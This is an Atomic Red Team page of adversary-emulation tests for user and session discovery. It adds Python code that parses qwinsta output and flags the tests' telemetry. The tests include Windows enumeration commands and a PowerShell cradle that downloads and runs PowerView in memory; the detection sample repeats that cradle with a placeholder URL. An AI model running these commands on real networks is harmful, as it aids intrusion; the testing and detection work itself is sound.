Latest commit bc21f59 Sep 4, 2021
4 contributors

@clr2of8 @ForensicITGuy @Tsora-Pop @mgraeber-rc

T1033 - System Owner/User Discovery

Description from ATT&CK

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly use a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Utilities and commands that acquire this information include whoami. On Mac and Linux, the currently logged in user can be identified with w and who.

Atomic Tests

Atomic Test #1 - System Owner/User Discovery

Identify system owner or users on an endpoint.

Upon successful execution, cmd.exe will run several commands against the target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk, computers.txt and usernames.txt. Note that the single > redirection in each for loop overwrites its file on every iteration, so each file ends up holding only the last match. quser and qwinsta with /SERVER: only work against a remote host that allows remote RPC for Remote Desktop Services (the AllowRemoteRPC value under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server), and wmic is deprecated on current Windows releases; Get-CimInstance Win32_UserAccount returns the same account list.

Supported Platforms: Windows

auto_generated_guid: 4c4959bf-addf-4b4a-be86-8d09cc1857aa


| Name | Description | Type | Default Value |
| ---- | ----------- | ---- | ------------- |
| computer_name | Name of remote computer | String | localhost |

Attack Commands: Run with command_prompt!

cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
qwinsta.exe /server:#{computer_name}
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
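The two for /F loops above tokenise qwinsta output on whitespace. That is fragile: disconnected sessions have an empty SESSIONNAME column, so the username becomes the first token, sessions such as services and the rdp-tcp listener have no username at all, and the current session carries a leading > marker. The Python below is an added example, not part of the Atomic Red Team test, that parses the same output by the header's column offsets instead. The sample output is constructed for this example, and cmd_for_tokens reproduces what for /F "tokens=1,2" would see on a given row.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample of `qwinsta` (alias `query session`) output; not captured from a
# real host. It includes the rows the whitespace-tokenising loop mishandles: sessions
# with no USERNAME (services, the rdp-tcp listener), the `>` marker on the current
# session, and a disconnected session whose SESSIONNAME column is empty.
SAMPLE_QWINSTA = """\
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
>console           alice                     1  Active
 rdp-tcp#3         bob                       2  Active  rdpwd
                   carol                     3  Disc
 rdp-tcp                                 65536  Listen
"""


@dataclass
class Session:
    session_name: str
    username: str
    session_id: int
    state: str
    current: bool  # row was marked with a leading '>'


# Everything right of the USERNAME column: optional user, numeric ID, STATE, optional TYPE/DEVICE.
_ROW_RE = re.compile(
    r"^\s*(?P<user>\S+)?\s+(?P<id>\d+)\s+(?P<state>\S+)(?:\s+\S+)?(?:\s+\S+)?\s*$"
)


def parse_qwinsta(text: str) -> List[Session]:
    """Parse qwinsta output, using the header line to locate the USERNAME column."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = next(ln for ln in lines if "SESSIONNAME" in ln and "USERNAME" in ln)
    user_col = header.index("USERNAME")
    sessions = []
    for line in lines:
        if line == header:
            continue
        current = line.startswith(">")
        if current:
            line = " " + line[1:]          # drop the marker without shifting columns
        session_name = line[:user_col].strip()
        m = _ROW_RE.match(line[user_col:])
        if not m:
            continue                       # not a session row
        sessions.append(Session(session_name, m.group("user") or "",
                                int(m.group("id")), m.group("state"), current))
    return sessions


def logged_on_users(text: str) -> Dict[str, str]:
    """Map username -> session state for every session that actually has a user."""
    return {s.username: s.state for s in parse_qwinsta(text) if s.username}


def cmd_for_tokens(line: str) -> Tuple[str, str]:
    """What `for /F "tokens=1,2"` yields as %i and %j for one output line."""
    parts = line.split()
    return (parts[0] if parts else "", parts[1] if len(parts) > 1 else "")


if __name__ == "__main__":
    for s in parse_qwinsta(SAMPLE_QWINSTA):
        print(s)
    print(logged_on_users(SAMPLE_QWINSTA))
    # On the disconnected row the username lands in %i, where the loop expects a session name.
    print(cmd_for_tokens("                   carol                     3  Disc"))
```

The parser keeps the Disc sessions, which the loop's findstr "Active Disc" filter also wants, but attributes them to the right user; the same approach works on the output of query session, which prints the same layout.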

Atomic Test #2 - System Owner/User Discovery

Identify system owner or users on an endpoint.

Upon successful execution, sh will print a list of usernames to stdout.

Supported Platforms: Linux, macOS

auto_generated_guid: 2a9b677d-a230-44f4-ad86-782df1ef108c

Attack Commands: Run with sh!


Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)

Find existing user sessions on other computers. Upon execution, information about any sessions discovered will be displayed. With -Stealth, PowerView does not touch every computer in the domain: it queries Active Directory for the hosts users are most likely to have sessions on (file servers taken from users' home directory, profile and logon script paths, plus domain controllers) and enumerates sessions only on those.

Supported Platforms: Windows

auto_generated_guid: 29857f27-a36f-4f7e-8084-4557cd6207ca

Attack Commands: Run with powershell!

# Force TLS 1.2 so the download below succeeds against servers that reject older protocols
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# Download PowerView straight into memory (URL not shown on this page) and hunt for sessions
IEX (IWR '' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
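All three tests leave telemetry a defender can key on: process creations for the whoami, wmic, quser and qwinsta chain of Test #1 and the w, who and users commands of Test #2, and PowerShell script block logging (event 4104) for the in-memory PowerView cradle of Test #3. The Python below is an added detection example, not code from the Atomic Red Team project, that runs three rules over constructed Sysmon/auditd-style events. The field names ("ts", "host", "user", "kind", "cmd"), the 60-second window, the threshold of three distinct tools and the placeholder URL in the script block are this example's own assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Constructed telemetry, not from a real host. Field names are this example's own,
# not a Sysmon or auditd schema.
EVENTS = [
    {"ts": "2021-09-04T10:00:01", "host": "WS01", "user": "CORP\\alice", "kind": "process", "cmd": "cmd.exe /C whoami"},
    {"ts": "2021-09-04T10:00:02", "host": "WS01", "user": "CORP\\alice", "kind": "process", "cmd": "wmic useraccount get /ALL"},
    {"ts": "2021-09-04T10:00:03", "host": "WS01", "user": "CORP\\alice", "kind": "process", "cmd": 'quser /SERVER:"FS01"'},
    {"ts": "2021-09-04T10:00:04", "host": "WS01", "user": "CORP\\alice", "kind": "process", "cmd": "qwinsta.exe /server:FS01"},
    # A single whoami from an administrator: below the burst threshold, no alert.
    {"ts": "2021-09-04T11:30:00", "host": "WS02", "user": "CORP\\bob", "kind": "process", "cmd": "whoami"},
    {"ts": "2021-09-04T12:00:00", "host": "lnx01", "user": "deploy", "kind": "process", "cmd": "who"},
    {"ts": "2021-09-04T12:00:01", "host": "lnx01", "user": "deploy", "kind": "process", "cmd": "w"},
    {"ts": "2021-09-04T12:00:02", "host": "lnx01", "user": "deploy", "kind": "process", "cmd": "users"},
    # PowerShell 4104 script block text; the URL is a placeholder for this sample.
    {"ts": "2021-09-04T13:00:00", "host": "WS03", "user": "CORP\\carol", "kind": "scriptblock",
     "cmd": "IEX (IWR 'https://example.invalid/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose"},
]

DISCOVERY_TOOLS = {"whoami", "quser", "qwinsta", "query", "wmic", "w", "who", "users"}
WINDOW = timedelta(seconds=60)          # assumed correlation window
MIN_DISTINCT_TOOLS = 3                  # assumed burst threshold
_SERVER_RE = re.compile(r'/server:"?([^"\s]+)"?', re.IGNORECASE)
_CRADLE_RE = re.compile(r"\bIEX\s*\(\s*(?:IWR|Invoke-WebRequest|Invoke-RestMethod)\b|Invoke-UserHunter", re.IGNORECASE)


def _basename(token: str) -> str:
    name = token.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def discovery_tool(cmd: str) -> Optional[str]:
    """Return the T1033 discovery tool a command line runs, or None."""
    tokens = cmd.split()
    if not tokens:
        return None
    lowered = [t.lower() for t in tokens]
    if _basename(tokens[0]) == "cmd" and "/c" in lowered:   # cmd.exe /C <command>
        tokens = tokens[lowered.index("/c") + 1:]
        if not tokens:
            return None
    tool, args = _basename(tokens[0]), [t.lower() for t in tokens[1:]]
    if tool == "wmic":                       # only the account-enumeration alias counts
        return tool if "useraccount" in args else None
    if tool == "query":                      # `query user` / `query session`
        return tool if args[:1] in (["user"], ["session"]) else None
    return tool if tool in DISCOVERY_TOOLS else None


def remote_target(cmd: str) -> Optional[str]:
    """Host named by a /server: switch, unless it is the local machine."""
    m = _SERVER_RE.search(cmd)
    if not m:
        return None
    host = m.group(1).lower()
    return None if host in {"localhost", "127.0.0.1", "."} else host


def detect(events: List[dict]) -> List[dict]:
    alerts: List[dict] = []
    # Rule 1: MIN_DISTINCT_TOOLS or more different discovery tools by one user on one host within WINDOW.
    hits: Dict[Tuple[str, str], List[Tuple[datetime, str]]] = defaultdict(list)
    for ev in events:
        tool = discovery_tool(ev["cmd"]) if ev["kind"] == "process" else None
        if tool:
            hits[(ev["host"], ev["user"])].append((datetime.fromisoformat(ev["ts"]), tool))
    for (host, user), seen in hits.items():
        seen.sort()
        for i, (t0, _) in enumerate(seen):
            tools = {tool for t, tool in seen[i:] if t - t0 <= WINDOW}
            if len(tools) >= MIN_DISTINCT_TOOLS:
                alerts.append({"rule": "discovery_burst", "host": host, "user": user, "detail": sorted(tools)})
                break
    # Rule 2: session enumeration pointed at another host (one alert per actor/target pair).
    reported = set()
    for ev in events:
        target = remote_target(ev["cmd"]) if ev["kind"] == "process" else None
        if target and (ev["host"], ev["user"], target) not in reported:
            reported.add((ev["host"], ev["user"], target))
            alerts.append({"rule": "remote_session_enum", "host": ev["host"], "user": ev["user"], "detail": target})
    # Rule 3: PowerView user hunting or an in-memory download cradle in script block logs.
    for ev in events:
        if ev["kind"] == "scriptblock" and _CRADLE_RE.search(ev["cmd"]):
            alerts.append({"rule": "powerview_userhunter", "host": ev["host"], "user": ev["user"], "detail": ev["cmd"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The burst rule is what separates the test's command chain from an administrator typing whoami once; the remote /server: rule fires on far less volume, because enumerating sessions on another host is rarely done by hand, and the script block rule catches the cradle regardless of which URL PowerView is pulled from.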